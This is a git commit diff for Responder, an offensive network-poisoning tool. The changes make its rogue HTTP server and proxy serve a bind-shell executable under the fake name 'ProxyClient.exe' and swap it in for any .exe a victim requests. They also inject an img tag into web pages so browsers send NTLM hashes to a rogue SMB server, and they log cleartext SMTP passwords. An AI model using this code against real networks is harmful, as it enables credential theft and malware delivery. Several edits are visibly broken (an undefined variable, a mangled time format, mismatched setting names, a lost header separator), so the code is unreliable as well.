Further improvements and fixes.

2025-07-16 10:02:53 -07:00 · 2015-07-02 13:32:10 +10:00 · 2015-07-02 13:32:10 +10:00 · 066c15154d
commit 066c15154d
parent c6de2e9d3a
19 changed files with 179 additions and 214 deletions
--- a/Responder.conf
+++ b/Responder.conf
@ -44,27 +44,31 @@ DontRespondToName =

 [HTTP Server]

-; Set to On to always serve the custom .exe regardless of the URL
+; Set to On to always serve the custom EXE
 Serve-Always = Off

-; Set to On to serve the custom .exe when the URL contains .exe
+; Set to On to replace any requested .exe with the custom EXE
 Serve-Exe = On

 ; Set to on to serve the custom HTML if the URL does not contain .exe
-Serve-Html = On
+; Set to Off to inject the 'HTMLToInject' in web pages instead
+Serve-Html = Off

 ; Custom HTML to serve
-HtmlFilename = files/AccedsDenied.html
+HtmlFilename = files/AccessDenied.html

 ; Custom EXE File to serve
 ExeFilename = files/BindShell.exe

+; Name of the downloaded .exe that the client will see
+ExeDownloadName = ProxyClient.exe
+
 ; Custom WPAD Script
 WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}

 ; HTML answer to inject in HTTP responses (before </body> tag).
 ; In this example, we redirect make users' browsers issue a request to our rogue SMB server.
-HTMLToServe = <img src='file:\\\\\RespProxySrv\ssed\seyad.ico' alt='Loading' height='1' width='1'>
+HTMLToInject = <img src='file:\\\\\RespProxySrv\ssed\seyad.ico' alt='Loading' height='1' width='1'>


 [HTTPS Server]
--- a/Responder.py
+++ b/Responder.py
@ -126,11 +126,11 @@ def serve_MDNS_poisoner(host, port, handler):
 		print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."

 def serve_LLMNR_poisoner(host, port, handler):
-	#try:
+	try:
 		server = ThreadingUDPLLMNRServer((host, port), handler)
 		server.serve_forever()
-	#except:
-	#	print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
+	except:
+		print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."

 def serve_thread_udp(host, port, handler):
 	try:
@ -238,7 +238,6 @@ def main():
 			thread.start_new(serve_thread_udp,('', 53, DNS))
 			thread.start_new(serve_thread_tcp,('', 53, DNSTCP))

-
 		print color('[+]', 2, 1) + " Listening for events..."

 		while True:
--- a/fingerprint.py
+++ b/fingerprint.py
@ -1,7 +1,6 @@
 #!/usr/bin/env python
-# NBT-NS/LLMNR Responder
-# Created by Laurent Gaffie
-# Copyright (C) 2014 Trustwave Holdings, Inc.
+# This file is part of Responder
+# Original work by Laurent Gaffie - Trustwave Holdings
 #
 # This program is free software: you can redistribute it and/or modify
 # it under the terms of the GNU General Public License as published by
--- a/odict.py
+++ b/odict.py
@ -1,6 +1,6 @@
-# NBT-NS/LLMNR Responder
-# Created by Laurent Gaffie
-# Copyright (C) 2014 Trustwave Holdings, Inc.
+#!/usr/bin/env python
+# This file is part of Responder
+# Original work by Laurent Gaffie - Trustwave Holdings
 #
 # This program is free software: you can redistribute it and/or modify
 # it under the terms of the GNU General Public License as published by
@ -14,7 +14,6 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-
 from UserDict import DictMixin

 class OrderedDict(dict, DictMixin):
--- a/packets.py
+++ b/packets.py
@ -282,6 +282,9 @@ class ServeExeFile(Packet):
 		("AcceptRanges",  "Accept-Ranges: bytes\r\n"),
 		("Server",        "Server: Microsoft-IIS/7.5\r\n"),
 		("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
+		("ContentDisp",   "Content-Disposition: attachment; filename="),
+		("ContentDiFile", ""),
+		("FileCRLF",      ";\r\n"),
 		("ContentLen",    "Content-Length: "),
 		("ActualLen",     "76"), 
 		("Date",          "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"),
@ -306,8 +309,6 @@ class ServeHtmlFile(Packet):
 		("ActualLen",     "76"), 
 		("Date",          "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"),
 		("Connection",    "Connection: keep-alive\r\n"),
-		("X-CCC",         "US\r\n"),
-		("X-CID",         "2\r\n"),
 		("CRLF",          "\r\n"),
 		("Payload",       "jj"),
 	])
--- a/poisoners/LLMNR.py
+++ b/poisoners/LLMNR.py
@ -54,7 +54,7 @@ def IsICMPRedirectPlausible(IP):
 			pass

 if settings.Config.AnalyzeMode:
-	AnalyzeICMPRedirect(settings.Config.Bind_To)
+	IsICMPRedirectPlausible(settings.Config.Bind_To)

 # LLMNR Server class
 class LLMNR(BaseRequestHandler):
--- a/poisoners/MDNS.py
+++ b/poisoners/MDNS.py
@ -50,7 +50,7 @@ class MDNS(BaseRequestHandler):
 			return None

 		try:
-			# Analyze
+			# Analyze Mode
 			if settings.Config.AnalyzeMode:
 				if Parse_IPV6_Addr(data):
 					print text('[Analyze mode: MDNS] Request by %-15s for %s, ignoring' % (color(self.client_address[0], 3), color(Request_Name, 3)))
--- a/poisoners/NBTNS.py
+++ b/poisoners/NBTNS.py
@ -25,13 +25,13 @@ from utils import *

 def NBT_NS_Role(data):
 	Role = {
-		"\x41\x41\x00":"Workstation/Redirector Service.",
-		"\x42\x4c\x00":"Domain Master Browser. This name is likely a domain controller or a homegroup.)",
-		"\x42\x4d\x00":"Domain controller service. This name is a domain controller.",
-		"\x42\x4e\x00":"Local Master Browser.",
-		"\x42\x4f\x00":"Browser Election Service.",
-		"\x43\x41\x00":"File Server Service.",
-		"\x41\x42\x00":"Browser Service.",
+		"\x41\x41\x00":"Workstation/Redirector",
+		"\x42\x4c\x00":"Domain Master Browser",
+		"\x42\x4d\x00":"Domain Controller",
+		"\x42\x4e\x00":"Local Master Browser",
+		"\x42\x4f\x00":"Browser Election",
+		"\x43\x41\x00":"File Server",
+		"\x41\x42\x00":"Browser",
 	}

 	if data in Role:
@ -44,15 +44,15 @@ def Validate_NBT_NS(data):
 	if settings.Config.AnalyzeMode:
 		return False

-	if NBT_NS_Role(data[43:46]) == "File Server Service.":
+	if NBT_NS_Role(data[43:46]) == "File Server":
 		return True

 	if settings.Config.NBTNSDomain == True:
-		if NBT_NS_Role(data[43:46]) == "Domain controller service. This name is a domain controller.":
+		if NBT_NS_Role(data[43:46]) == "Domain Controller":
 			return True

 	if settings.Config.Wredirect == True:
-		if NBT_NS_Role(data[43:46]) == "Workstation/Redirector Service.":
+		if NBT_NS_Role(data[43:46]) == "Workstation/Redirector":
 			return True

 	else:
--- a/servers/HTTP.py
+++ b/servers/HTTP.py
@ -106,10 +106,10 @@ def ServeFile(Filename):
 		bk.close()
 		return data

-def RespondWithFile(client, filename):
+def RespondWithFile(client, filename, dlname=None):
 	
 	if filename.endswith('.exe'):
-		Buffer = ServeExeFile(Payload = ServeFile(filename))
+		Buffer = ServeExeFile(Payload = ServeFile(filename), ContentDiFile=dlname)
 	else:
 		Buffer = ServeHtmlFile(Payload = ServeFile(filename))

@ -136,14 +136,16 @@ def PacketSequence(data, client):
 	NTLM_Auth = re.findall('(?<=Authorization: NTLM )[^\\r]*', data)
 	Basic_Auth = re.findall('(?<=Authorization: Basic )[^\\r]*', data)

-	# Send the .exe if needed
+	# Serve the .exe if needed
 	if settings.Config.Serve_Always == True or (settings.Config.Serve_Exe == True and re.findall('.exe', data)):
-		return RespondWithFile(client, settings.Config.Exe_Filename)
+		return RespondWithFile(client, settings.Config.Exe_Filename, settings.Config.Exe_DlName)

-	# Send the custom HTML if needed
+	# Serve the custom HTML if needed
 	if settings.Config.Serve_Html == True:
 		return RespondWithFile(client, settings.Config.Html_Filename)

+	WPAD_Custom = WpadCustom(data, client)
+	
 	if NTLM_Auth:
 		Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]

@ -163,42 +165,46 @@ def PacketSequence(data, client):
 		if Packet_NTLM == "\x03":
 			NTLM_Auth = b64decode(''.join(NTLM_Auth))
 			ParseHTTPHash(NTLM_Auth, client)
-			WPAD_Custom = WpadCustom(data, client)

 			if settings.Config.Force_WPAD_Auth and WPAD_Custom:
 				print text("[HTTP] WPAD (auth) file sent to %s" % client)
 				return WPAD_Custom

 			else:
-				Buffer = IIS_Auth_Granted(Payload=settings.Config.HTMLToServe)
+				Buffer = IIS_Auth_Granted(Payload=settings.Config.HTMLToInject)
 				Buffer.calculate()
 				return str(Buffer)

-	if Basic_Auth:
+	elif Basic_Auth:
 		ClearText_Auth = b64decode(''.join(Basic_Auth))

 		GrabURL(data, client)
 		GrabHost(data, client)
 		GrabCookie(data, client)

-		WPAD_Custom = WpadCustom(data,client)
-
 		print text("[HTTP] (Basic) Client       : %s" % client)
 		print text("[HTTP] (Basic) Username     : %s" % ClearText_Auth.split(':')[0])
 		print text("[HTTP] (Basic) Password     : %s" % ClearText_Auth.split(':')[1])
 		WriteData(settings.Config.HTTPBasicLog % client, ClearText_Auth, ClearText_Auth)

 		if settings.Config.Force_WPAD_Auth and WPAD_Custom:
-			print text("[HTTP] WPAD (auth) file sent to %s" % client, 3, 0)
+			print text("[HTTP] WPAD (auth) file sent to %s" % client)
 			return WPAD_Custom

 		else:
-			Buffer = IIS_Auth_Granted(Payload=settings.Config.HTMLToServe)
+			Buffer = IIS_Auth_Granted(Payload=settings.Config.HTMLToInject)
 			Buffer.calculate()
 			return str(Buffer)

 	else:
-		Response = IIS_Basic_401_Ans() if settings.Config.Basic == True else IIS_Auth_401_Ans()
+		if settings.Config.Basic == True:
+			Response = IIS_Basic_401_Ans()
+			print text("[HTTP] Sending BASIC authentication request to %s" % client)
+
+		else:
+			Response = IIS_Auth_401_Ans()
+			print text("[HTTP] Sending NTLM authentication request to %s" % client)
+
 		return str(Response)

 # HTTP Server class
--- a/servers/HTTP_Proxy.py
+++ b/servers/HTTP_Proxy.py
@ -21,44 +21,19 @@ import select
 import zlib
 import BaseHTTPServer

+from servers.HTTP import RespondWithFile
 from utils import *

-def HandleGzip(Headers, Content, Payload):
-	if len(Content) > 5:
-		try:
-			unziped = zlib.decompress(Content, 16+zlib.MAX_WBITS)
-		except:
-			return False
+def InjectData(data, client, req_uri):

-		InjectPayload = Payload
-		Len = ''.join(re.findall('(?<=Content-Length: )[^\r\n]*', Headers))
-		HasBody = re.findall('(?<=<body)[^<]*', unziped)
+	# Serve the .exe if needed
+	if settings.Config.Serve_Always == True:
+		return RespondWithFile(client, settings.Config.Exe_Filename, settings.Config.Exe_DlName)

-		if HasBody:
-			print text("[PROXY] Injecting into HTTP Response: %s" % color(settings.Config.HTMLToServe, 3, 1))
+	# Serve the .exe if needed and client requested a .exe
+	if settings.Config.Serve_Exe == True and req_uri.endswith('.exe'):
+		return RespondWithFile(client, settings.Config.Exe_Filename, os.path.basename(req_uri))

-			Content = unziped.replace("<body", settings.Config.HTMLToServe +"\n<body")
-			ziped = zlib.compress(Content)
-			FinalLen = str(len(ziped))
-			Headers = Headers.replace("Content-Length: "+Len, "Content-Length: "+FinalLen)
-			return Headers+'\r\n\r\n'+ziped
-	
-	return False
-
-def InjectPage(data, client):
-	if settings.Config.Exec_Mode_On_Off:
-		if settings.Config.Exe_Filename.endswith('.exe'):
-			buffer1 = ServeAlwaysExeFile(Payload = ServeEXE(data,client,settings.Config.Exe_Filename),ContentDiFile=settings.Config.Exe_Filename)
-			buffer1.calculate()
-			return str(buffer1)
-		else:
-			buffer1 = ServeAlwaysNormalFile(Payload = ServeEXE(data,client,settings.Config.Exe_Filename))
-			buffer1.calculate()
-			return str(buffer1)
-	else:
-		return data
-
-def InjectData(data):
 	if len(data.split('\r\n\r\n')) > 1:
 		try:
 			Headers, Content = data.split('\r\n\r\n')
@ -71,22 +46,30 @@ def InjectData(data):
 			return data

 		if "content-encoding: gzip" in Headers.lower():
-
-			Gzip = HandleGzip(Headers, Content, settings.Config.HTMLToServe)
-			return Gzip if Gzip else data
+			Content = zlib.decompress(Content, 16+zlib.MAX_WBITS)

 		if "content-type: text/html" in Headers.lower():

+			# Serve the custom HTML if needed
+			if settings.Config.Serve_Html == True:
+				return RespondWithFile(client, settings.Config.Html_Filename)
+
 			Len = ''.join(re.findall('(?<=Content-Length: )[^\r\n]*', Headers))
-			HasBody = re.findall('(?<=<body)[^<]*', Content)
+			HasBody = re.findall('(<body[^>]*>)', Content)

 			if HasBody:
-				print text("[PROXY] Injecting into HTTP Response: %s" % color(settings.Config.HTMLToServe, 3, 1))
+				print text("[PROXY] Injecting into HTTP Response: %s" % color(settings.Config.HTMLToInject, 3, 1))

-				NewContent = Content.replace("<body", settings.Config.HTMLToServe +"\n<body")
-				Headers = Headers.replace("Content-Length: "+Len, "Content-Length: "+ str(len(NewContent)))
+				Content = Content.replace(HasBody[0], '%s\n%s' % (HasBody[0], settings.Config.HTMLToInject))
+				Headers = Headers.replace("Content-Length: "+Len, "Content-Length: "+ str(len(Content)))

-				return Headers+'\r\n\r\n'+NewContent
+		if "content-encoding: gzip" in Headers.lower():
+			Content = zlib.compress(lContent)
+
+		data = Headers +'\r\n'+ Content
+
+	#else:
+	#	print text("[PROXY] Returning unmodified HTTP response")

 	return data

@ -185,10 +168,8 @@ class ProxySock:
 		return self.socket.recv_into(buffer, *args)
 	
 	def send(self, *args) :
-		try:
-			return self.socket.send(*args)
-		except:
-			pass
+		try: return self.socket.send(*args)
+		except: pass
 	
 	def sendall(self, *args) :
 		return self.socket.sendall(*args)
@ -224,6 +205,7 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):

 	def handle(self):
 		(ip, port) =  self.client_address
+		print text("[PROXY] Received connection from %s" % self.client_address[0])
 		self.__base_handle()

 	def _connect_to(self, netloc, soc):
@ -291,8 +273,8 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):

 				Cookie = self.headers['Cookie'] if "Cookie" in self.headers else ''

-				print text("[PROXY] Client        : %s" % color(self.client_address[0], 3, 0))
-				print text("[PROXY] Requested URL : %s" % color(self.path, 3, 0))
+				print text("[PROXY] Client        : %s" % color(self.client_address[0], 3))
+				print text("[PROXY] Requested URL : %s" % color(self.path, 3))
 				print text("[PROXY] Cookie        : %s" % Cookie)

 				self.headers['Connection'] = 'close'
@ -302,8 +284,10 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
 					soc.send("%s: %s\r\n" % key_val)
 				soc.send("\r\n")

-				try: self._read_write(soc, netloc)
-				except: pass
+				try:
+					self._read_write(soc, netloc)
+				except:
+					pass

 		finally:
 			soc.close()
@ -322,18 +306,16 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
 				for i in ins:
 					if i is soc:
 						out = self.connection
-						try:
-							data = i.recv(8192)
-							if len(settings.Config.HTMLToServe)>5:
-								data = InjectData(data)
-							else:
-								data = InjectPage(data,self.client_address[0])
-
-						except:
-							pass
+						#try:
+						data = i.recv(4096)
+						if len(data) > 1:
+							data = InjectData(data, self.client_address[0], self.path)
+						#except:
+						#	pass
 					else:
 						out = soc
-						data = i.recv(8192)
+						data = i.recv(4096)
+
 						if self.command == "POST":
 							print text("[PROXY] POST Data     : %s" % data)
 					if data:
--- a/servers/SMTP.py
+++ b/servers/SMTP.py
@ -1,3 +1,19 @@
+#!/usr/bin/env python
+# This file is part of Responder
+# Original work by Laurent Gaffie - Trustwave Holdings
+#
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
 import os
 import settings

@ -27,12 +43,11 @@ class ESMTP(BaseRequestHandler):

 					if data:
 						Password = b64decode(data[:len(data)-2])
-						Outfile = os.path.join(settings.Config.ResponderPATH, 'logs', "SMTP-Clear-Text-Password-%s.txt" % self.client_address[0])
-						WriteData(Outfile,Username+":"+Password, Username+":"+Password)

 						print text("[SMTP] Address  : %s" % color(self.client_address[0], 3, 0))
 						print text("[SMTP] Username : %s" % color(Username, 3, 0))
 						print text("[SMTP] Password : %s" % color(Password, 3, 0))
+						WriteData(settings.Config.SMTPClearLog % self.client_address[0], Username+":"+Password, Username+":"+Password)

 						## FIXME: Close connection properly

--- a/settings.py
+++ b/settings.py
@ -104,6 +104,7 @@ class Settings:
 		self.HTTPBasicLog    = os.path.join(self.ResponderPATH, 'logs', 'HTTP-Clear-Text-Password-%s.txt')
 		self.LDAPClearLog    = os.path.join(self.ResponderPATH, 'logs', 'LDAP-Clear-Text-Password-%s.txt')
 		self.SMBClearLog     = os.path.join(self.ResponderPATH, 'logs', 'SMB-Clear-Text-Password-%s.txt')
+		self.SMTPClearLog    = os.path.join(self.ResponderPATH, 'logs', 'SMTP-Clear-Text-Password-%s.txt')
 		self.MSSQLClearLog   = os.path.join(self.ResponderPATH, 'logs', 'MSSQL-Clear-Text-Password-%s.txt')

 		self.LDAPNTLMv1Log   = os.path.join(self.ResponderPATH, 'logs', 'LDAP-NTLMv1-Client-%s.txt')
@ -123,8 +124,9 @@ class Settings:
 		self.Serve_Html       = self.toBool(config.get('HTTP Server', 'Serve-Html'))
 		self.Html_Filename    = config.get('HTTP Server', 'HtmlFilename')
 		self.Exe_Filename     = config.get('HTTP Server', 'ExeFilename')
+		self.Exe_DlName       = config.get('HTTP Server', 'ExeDownloadName')
 		self.WPAD_Script      = config.get('HTTP Server', 'WPADScript')
-		self.HTMLToServe      = config.get('HTTP Server', 'HTMLToServe')
+		self.HtmlToInject     = config.get('HTTP Server', 'HtmlToInject')

 		if not os.path.exists(self.Html_Filename):
 			print utils.color("/!\ Warning: %s: file not found" % self.Html_Filename, 3, 1)
@ -155,8 +157,8 @@ class Settings:
 		self.AnalyzeMode     = options.Analyze
 		self.CommandLine     = str(sys.argv)

-		if self.HTMLToServe == None:
-			self.HTMLToServe = ''
+		if self.HtmlToInject == None:
+			self.HtmlToInject = ''

 		self.Bind_To = utils.FindLocalIP(self.Interface)

@ -194,5 +196,5 @@ class Settings:
 		self.AnalyzeLogger.addHandler(ALog_Handler)

 def init():
-	global Config
+	global Config, Threads
 	Config = Settings()
--- a/tools/DHCP.py
+++ b/tools/DHCP.py
@ -1,7 +1,6 @@
 #!/usr/bin/env python
-# This utility is part of NBT-NS/LLMNR Responder
-# Created by Laurent Gaffie
-# Copyright (C) 2014 Trustwave Holdings, Inc.
+# This file is part of Responder
+# Original work by Laurent Gaffie - Trustwave Holdings
 #
 # This program is free software: you can redistribute it and/or modify
 # it under the terms of the GNU General Public License as published by
@ -15,7 +14,13 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import sys,struct,socket,re,optparse,ConfigParser,os
+import sys
+import struct
+import socket
+import re
+import optparse
+import ConfigParser
+import os
 from odict import OrderedDict
 from socket import inet_aton, inet_ntoa

--- a/tools/FindSMB2UPTime.py
+++ b/tools/FindSMB2UPTime.py
@ -1,7 +1,6 @@
 #!/usr/bin/env python
-# NBT-NS/LLMNR Responder
-# Created by Laurent Gaffie
-# Copyright (C) 2014 Trustwave Holdings, Inc.
+# This file is part of Responder
+# Original work by Laurent Gaffie - Trustwave Holdings
 #
 # This program is free software: you can redistribute it and/or modify
 # it under the terms of the GNU General Public License as published by
@ -15,30 +14,20 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import datetime, struct
-import sys,socket,struct
-from socket import *
-from odict import OrderedDict
+import sys
+import os
+import datetime
+import struct
+import socket

-class Packet():
-    fields = OrderedDict([
-        ("", ""),
-    ])
-    def __init__(self, **kw):
-        self.fields = OrderedDict(self.__class__.fields)
-        for k,v in kw.items():
-            if callable(v):
-                self.fields[k] = v(self.fields[k])
-            else:
-                self.fields[k] = v
-    def __str__(self):
-        return "".join(map(str, self.fields.values()))
+sys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__), '..')))
+from packets import SMBHeader, SMBNego, SMBNegoData

 def GetBootTime(data):
    Filetime = int(struct.unpack('<q',data)[0])
    t = divmod(Filetime - 116444736000000000, 10000000)
    time = datetime.datetime.fromtimestamp(t[0])
-    return time, time.strftime('%Y-%m-%d %H:%M:%S')
+    return time, time.strftime('%Y-%m-%d %Header:%M:%S')


 def IsDCVuln(t):
@ -53,55 +42,19 @@ def NbtLen(data):
    Len = struct.pack(">i", len(data))
    return Len

-from packets import SMBHeader
-"""
-class SMBHeader(Packet):
-    fields = OrderedDict([
-        ("Proto", "\xff\x53\x4d\x42"),
-        ("Cmd", "\x72"),
-        ("Error-Code", "\x00\x00\x00\x00" ),
-        ("Flag1", "\x10"),
-        ("Flag2", "\x00\x00"),
-        ("Pidhigh", "\x00\x00"),
-        ("Signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
-        ("Reserved", "\x00\x00"),
-        ("TID", "\x00\x00"),
-        ("PID", "\xff\xfe"),
-        ("UID", "\x00\x00"),
-        ("MID", "\x00\x00"),
-    ])
-"""
-
-class SMBNego(Packet):
-    fields = OrderedDict([
-        ("Wordcount", "\x00"),
-        ("Bcc", "\x62\x00"),
-        ("Data", "")
-    ])
-    
-    def calculate(self):
-        self.fields["Bcc"] = struct.pack("<H",len(str(self.fields["Data"])))
-
-class SMBNegoData(Packet):
-    fields = OrderedDict([
-        ("StrType","\x02" ),
-        ("dialect", "NT LM 0.12\x00"),
-        ("StrType1","\x02"),
-        ("dialect1", "SMB 2.002\x00"),
-        ("StrType2","\x02"),
-        ("dialect2", "SMB 2.???\x00"),
-    ])
-
 def run(host):
-    s = socket(AF_INET, SOCK_STREAM)
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(host)  
    s.settimeout(5) 
-    h = SMBHeader(Cmd="\x72",Flag1="\x18",Flag2="\x53\xc8")
-    n = SMBNego(Data = SMBNegoData())
-    n.calculate()
-    packet0 = str(h)+str(n)
-    buffer0 = NbtLen(packet0)+packet0
-    s.send(buffer0)
+
+    Header = SMBHeader(Cmd="\x72",Flag1="\x18",Flag2="\x53\xc8")
+    Nego = SMBNego(Data = SMBNegoData())
+    Nego.calculate()
+
+    Packet = str(Header)+str(Nego)
+    Buffer = NbtLen(Packet)+Packet
+    s.send(Buffer)
+
    try:
        data = s.recv(1024)
        if data[4:5] == "\xff":
--- a/tools/FindSQLSrv.py
+++ b/tools/FindSQLSrv.py
@ -1,7 +1,6 @@
 #!/usr/bin/env python
-# Created by Laurent Gaffie
-# This file is part of the Responder toolkit.
-# Copyright (C) 2014 Trustwave Holdings, Inc.
+# This file is part of Responder
+# Original work by Laurent Gaffie - Trustwave Holdings
 #
 # This program is free software: you can redistribute it and/or modify
 # it under the terms of the GNU General Public License as published by
@ -15,24 +14,26 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import socket
 from socket import *

-print 'MSSQL Server Finder 0.1\nPlease send bugs/comments/e-beer to: lgaffie@trustwave.com\n'
+print 'MSSQL Server Finder 0.1'

 s = socket(AF_INET,SOCK_DGRAM)
 s.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
 s.settimeout(2)
 s.sendto('\x02',('255.255.255.255',1434))
+
 try:
   while 1:
      data, address = s.recvfrom(8092)
      if not data:
         break
      else:
-         print "===============================================================\nHost details:",address[0]
+         print "==============================================================="
+         print "Host details:",address[0]
         print data[2:]
-         print "===============================================================\n"
+         print "==============================================================="
+         print ""
 except:
   pass

--- a/tools/Icmp-Redirect.py
+++ b/tools/Icmp-Redirect.py
@ -1,7 +1,6 @@
 #!/usr/bin/env python
-# NBT-NS/LLMNR Responder
-# Created by Laurent Gaffie
-# Copyright (C) 2014 Trustwave Holdings, Inc.
+# This file is part of Responder
+# Original work by Laurent Gaffie - Trustwave Holdings
 #
 # This program is free software: you can redistribute it and/or modify
 # it under the terms of the GNU General Public License as published by
--- a/tools/RelayPackets.py
+++ b/tools/RelayPackets.py
@ -1,6 +1,6 @@
-# NBT-NS/LLMNR Responder
-# Created by Laurent Gaffie
-# Copyright (C) 2014 Trustwave Holdings, Inc.
+#!/usr/bin/env python
+# This file is part of Responder
+# Original work by Laurent Gaffie - Trustwave Holdings
 #
 # This program is free software: you can redistribute it and/or modify
 # it under the terms of the GNU General Public License as published by
--- a/tools/SMBRelay.py
+++ b/tools/SMBRelay.py
@ -1,6 +1,6 @@
-# NBT-NS/LLMNR Responder
-# Created by Laurent Gaffie
-# Copyright (C) 2014 Trustwave Holdings, Inc.
+#!/usr/bin/env python
+# This file is part of Responder
+# Original work by Laurent Gaffie - Trustwave Holdings
 #
 # This program is free software: you can redistribute it and/or modify
 # it under the terms of the GNU General Public License as published by
--- a/utils.py
+++ b/utils.py
@ -1,5 +1,5 @@
 #!/usr/bin/env python
-# This file is part of Responder by Jeremy S - jrm` @ irc.freenode.net
+# This file is part of Responder
 # Original work by Laurent Gaffie - Trustwave Holdings
 #
 # This program is free software: you can redistribute it and/or modify
@ -33,7 +33,7 @@ def color(txt, code = 1, modifier = 0):

 def text(txt):
 	logging.info(txt)
-	return re.sub(r'\[([^]]*)\]', "\033[1;34m[\\1]\033[0m", txt)
+	return '\r'+re.sub(r'\[([^]]*)\]', "\033[1;34m[\\1]\033[0m", txt)

 def RespondToThisIP(ClientIp):

@ -174,7 +174,7 @@ def StartupMessage():

 	print color("[+] ", 2, 1) + "HTTP Options:"
 	print '    %-27s' % "Always serving EXE" + (enabled if settings.Config.Serve_Always else disabled)
-	print '    %-27s' % "Serving EXE for .exe URLs" + (enabled if settings.Config.Serve_Exe else disabled)
+	print '    %-27s' % "Serving EXE" + (enabled if settings.Config.Serve_Exe else disabled)
 	print '    %-27s' % "Serving HTML" + (enabled if settings.Config.Serve_Html else disabled)
 	print '    %-27s' % "Upstream Proxy" + (enabled if settings.Config.Upstream_Proxy else disabled)
 	#print '    %-27s' % "WPAD script" + settings.Config.WPAD_Script